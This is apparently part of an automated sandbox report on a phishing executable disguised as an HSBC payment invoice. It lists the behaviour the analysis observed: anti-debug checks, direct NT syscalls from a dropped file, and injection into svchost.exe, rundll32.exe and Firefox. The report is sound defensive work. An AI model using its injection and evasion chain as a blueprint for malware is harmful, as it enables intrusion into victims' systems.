            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D36A50 mov eax, dword ptr fs:[00000030h]2_2_03D36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D36A50 mov eax, dword ptr fs:[00000030h]2_2_03D36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D36A50 mov eax, dword ptr fs:[00000030h]2_2_03D36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D36A50 mov eax, dword ptr fs:[00000030h]2_2_03D36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D36A50 mov eax, dword ptr fs:[00000030h]2_2_03D36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D36A50 mov eax, dword ptr fs:[00000030h]2_2_03D36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D40A5B mov eax, dword ptr fs:[00000030h]2_2_03D40A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D40A5B mov eax, dword ptr fs:[00000030h]2_2_03D40A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DACA72 mov eax, dword ptr fs:[00000030h]2_2_03DACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DACA72 mov eax, dword ptr fs:[00000030h]2_2_03DACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D6CA6F mov eax, dword ptr fs:[00000030h]2_2_03D6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D6CA6F mov eax, dword ptr fs:[00000030h]2_2_03D6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D6CA6F mov eax, dword ptr fs:[00000030h]2_2_03D6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DDEA60 mov eax, dword ptr fs:[00000030h]2_2_03DDEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DBCA11 mov eax, dword ptr fs:[00000030h]2_2_03DBCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D54A35 mov eax, dword ptr fs:[00000030h]2_2_03D54A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D54A35 mov eax, dword ptr fs:[00000030h]2_2_03D54A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D6CA38 mov eax, dword ptr fs:[00000030h]2_2_03D6CA38
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D6CA24 mov eax, dword ptr fs:[00000030h]2_2_03D6CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D5EA2E mov eax, dword ptr fs:[00000030h]2_2_03D5EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03D3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03D3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03D3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03D3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03D3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03D3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D649D0 mov eax, dword ptr fs:[00000030h]2_2_03D649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DFA9D3 mov eax, dword ptr fs:[00000030h]2_2_03DFA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DC69C0 mov eax, dword ptr fs:[00000030h]2_2_03DC69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D629F9 mov eax, dword ptr fs:[00000030h]2_2_03D629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D629F9 mov eax, dword ptr fs:[00000030h]2_2_03D629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DBE9E0 mov eax, dword ptr fs:[00000030h]2_2_03DBE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DB89B3 mov esi, dword ptr fs:[00000030h]2_2_03DB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DB89B3 mov eax, dword ptr fs:[00000030h]2_2_03DB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DB89B3 mov eax, dword ptr fs:[00000030h]2_2_03DB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D429A0 mov eax, dword ptr fs:[00000030h]2_2_03D429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D429A0 mov eax, dword ptr fs:[00000030h]2_2_03D429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D429A0 mov eax, dword ptr fs:[00000030h]2_2_03D429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D429A0 mov eax, dword ptr fs:[00000030h]2_2_03D429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D429A0 mov eax, dword ptr fs:[00000030h]2_2_03D429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D429A0 mov eax, dword ptr fs:[00000030h]2_2_03D429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D429A0 mov eax, dword ptr fs:[00000030h]2_2_03D429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D429A0 mov eax, dword ptr fs:[00000030h]2_2_03D429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D429A0 mov eax, dword ptr fs:[00000030h]2_2_03D429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D429A0 mov eax, dword ptr fs:[00000030h]2_2_03D429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D429A0 mov eax, dword ptr fs:[00000030h]2_2_03D429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D429A0 mov eax, dword ptr fs:[00000030h]2_2_03D429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D429A0 mov eax, dword ptr fs:[00000030h]2_2_03D429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D309AD mov eax, dword ptr fs:[00000030h]2_2_03D309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D309AD mov eax, dword ptr fs:[00000030h]2_2_03D309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DB0946 mov eax, dword ptr fs:[00000030h]2_2_03DB0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DD4978 mov eax, dword ptr fs:[00000030h]2_2_03DD4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DD4978 mov eax, dword ptr fs:[00000030h]2_2_03DD4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DBC97C mov eax, dword ptr fs:[00000030h]2_2_03DBC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D56962 mov eax, dword ptr fs:[00000030h]2_2_03D56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D56962 mov eax, dword ptr fs:[00000030h]2_2_03D56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D56962 mov eax, dword ptr fs:[00000030h]2_2_03D56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D7096E mov eax, dword ptr fs:[00000030h]2_2_03D7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D7096E mov edx, dword ptr fs:[00000030h]2_2_03D7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D7096E mov eax, dword ptr fs:[00000030h]2_2_03D7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DBC912 mov eax, dword ptr fs:[00000030h]2_2_03DBC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D28918 mov eax, dword ptr fs:[00000030h]2_2_03D28918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D28918 mov eax, dword ptr fs:[00000030h]2_2_03D28918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DAE908 mov eax, dword ptr fs:[00000030h]2_2_03DAE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DAE908 mov eax, dword ptr fs:[00000030h]2_2_03DAE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DB892A mov eax, dword ptr fs:[00000030h]2_2_03DB892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DC892B mov eax, dword ptr fs:[00000030h]2_2_03DC892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D5E8C0 mov eax, dword ptr fs:[00000030h]2_2_03D5E8C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03E008C0 mov eax, dword ptr fs:[00000030h]2_2_03E008C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D6C8F9 mov eax, dword ptr fs:[00000030h]2_2_03D6C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D6C8F9 mov eax, dword ptr fs:[00000030h]2_2_03D6C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DFA8E4 mov eax, dword ptr fs:[00000030h]2_2_03DFA8E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DBC89D mov eax, dword ptr fs:[00000030h]2_2_03DBC89D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D30887 mov eax, dword ptr fs:[00000030h]2_2_03D30887
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D60854 mov eax, dword ptr fs:[00000030h]2_2_03D60854
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D34859 mov eax, dword ptr fs:[00000030h]2_2_03D34859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D34859 mov eax, dword ptr fs:[00000030h]2_2_03D34859
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D42840 mov ecx, dword ptr fs:[00000030h] | 2_2_03D42840
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03DBE872 mov eax, dword ptr fs:[00000030h] | 2_2_03DBE872
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03DBE872 mov eax, dword ptr fs:[00000030h] | 2_2_03DBE872
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03DC6870 mov eax, dword ptr fs:[00000030h] | 2_2_03DC6870
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03DC6870 mov eax, dword ptr fs:[00000030h] | 2_2_03DC6870
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03DBC810 mov eax, dword ptr fs:[00000030h] | 2_2_03DBC810
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D52835 mov eax, dword ptr fs:[00000030h] | 2_2_03D52835
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D52835 mov eax, dword ptr fs:[00000030h] | 2_2_03D52835
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D52835 mov eax, dword ptr fs:[00000030h] | 2_2_03D52835
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D52835 mov ecx, dword ptr fs:[00000030h] | 2_2_03D52835
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D52835 mov eax, dword ptr fs:[00000030h] | 2_2_03D52835
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D52835 mov eax, dword ptr fs:[00000030h] | 2_2_03D52835
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D6A830 mov eax, dword ptr fs:[00000030h] | 2_2_03D6A830
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03DD483A mov eax, dword ptr fs:[00000030h] | 2_2_03DD483A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03DD483A mov eax, dword ptr fs:[00000030h] | 2_2_03DD483A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03E04FE7 mov eax, dword ptr fs:[00000030h] | 2_2_03E04FE7
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D2EFD8 mov eax, dword ptr fs:[00000030h] | 2_2_03D2EFD8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D2EFD8 mov eax, dword ptr fs:[00000030h] | 2_2_03D2EFD8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D2EFD8 mov eax, dword ptr fs:[00000030h] | 2_2_03D2EFD8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D32FC8 mov eax, dword ptr fs:[00000030h] | 2_2_03D32FC8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D32FC8 mov eax, dword ptr fs:[00000030h] | 2_2_03D32FC8
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | Code function: 0_2_00ED81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, | 0_2_00ED81F7
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | Code function: 0_2_00EAA395 SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 0_2_00EAA395
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | Code function: 0_2_00EAA364 SetUnhandledExceptionFilter, | 0_2_00EAA364

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe | NtQueryVolumeInformationFile: Direct from: 0x76F12F2C
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe | NtQuerySystemInformation: Direct from: 0x76F148CC
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe | NtAllocateVirtualMemory: Direct from: 0x76F148EC
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe | NtQueryAttributesFile: Direct from: 0x76F12E6C
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe | NtReadVirtualMemory: Direct from: 0x76F12E8C
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe | NtCreateKey: Direct from: 0x76F12C6C
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe | NtSetInformationThread: Direct from: 0x76F12B4C
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe | NtClose: Direct from: 0x76F12B6C
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe | NtAllocateVirtualMemory: Direct from: 0x76F13C9C
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe | NtWriteVirtualMemory: Direct from: 0x76F1490C
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe | NtCreateUserProcess: Direct from: 0x76F1371C
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe | NtTerminateThread: Direct from: 0x76F12FCC
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe | NtCreateFile: Direct from: 0x76F12FEC
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe | NtOpenFile: Direct from: 0x76F12DCC
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe | NtQueryInformationToken: Direct from: 0x76F12CAC
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe | NtAllocateVirtualMemory: Direct from: 0x76F12BEC
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe | NtDeviceIoControlFile: Direct from: 0x76F12AEC
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe | NtSetInformationThread: Direct from: 0x76F063F9
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe | NtOpenSection: Direct from: 0x76F12E0C
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe | NtMapViewOfSection: Direct from: 0x76F12D1C
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe | NtResumeThread: Direct from: 0x76F136AC
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe | NtUnmapViewOfSection: Direct from: 0x76F12D3C
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe | NtCreateMutant: Direct from: 0x76F135CC
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe | NtWriteVirtualMemory: Direct from: 0x76F12E3C
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe | NtNotifyChangeKey: Direct from: 0x76F13C2C
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe | NtProtectVirtualMemory: Direct from: 0x76F07B2E
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe | NtProtectVirtualMemory: Direct from: 0x76F12F9C
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe | NtSetInformationProcess: Direct from: 0x76F12C5C
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe | NtOpenKeyEx: Direct from: 0x76F12B9C
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe | NtQueryInformationProcess: Direct from: 0x76F12C26
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe | NtResumeThread: Direct from: 0x76F12FBC
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe | NtDelayExecution: Direct from: 0x76F12DDC
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe | NtReadFile: Direct from: 0x76F12ADC
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe | NtQuerySystemInformation: Direct from: 0x76F12DFC
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe | NtAllocateVirtualMemory: Direct from: 0x76F12BFC
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\rundll32.exe | Section loaded: NULL target: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe protection: read write
            Source: C:\Windows\SysWOW64\rundll32.exe | Section loaded: NULL target: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\rundll32.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\rundll32.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\rundll32.exe | Thread register set: target process: 7272
            Source: C:\Windows\SysWOW64\rundll32.exe | Thread APC queued: target process: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 3133008
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | Code function: 0_2_00ED8C93 LogonUserW, | 0_2_00ED8C93
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | Code function: 0_2_00E83B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, | 0_2_00E83B4C
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | Code function: 0_2_00E84A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, | 0_2_00E84A35
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | Code function: 0_2_00EE4EF5 mouse_event, | 0_2_00EE4EF5
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe"
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe | Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
            Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | Code function: 0_2_00ED81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, | 0_2_00ED81F7
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | Code function: 0_2_00EE4C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, | 0_2_00EE4C03
            Source: HSBCscancopy-invoice778483-payment87476MT103.exe, 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: HSBCscancopy-invoice778483-payment87476MT103.exe, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000A.00000002.3723635161.0000000001A11000.00000002.00000001.00040000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000A.00000000.1448153514.0000000001A11000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
            Source: UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000A.00000002.3723635161.0000000001A11000.00000002.00000001.00040000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000A.00000000.1448153514.0000000001A11000.00000002.00000001.00040000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3723958940.0000000001AE1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
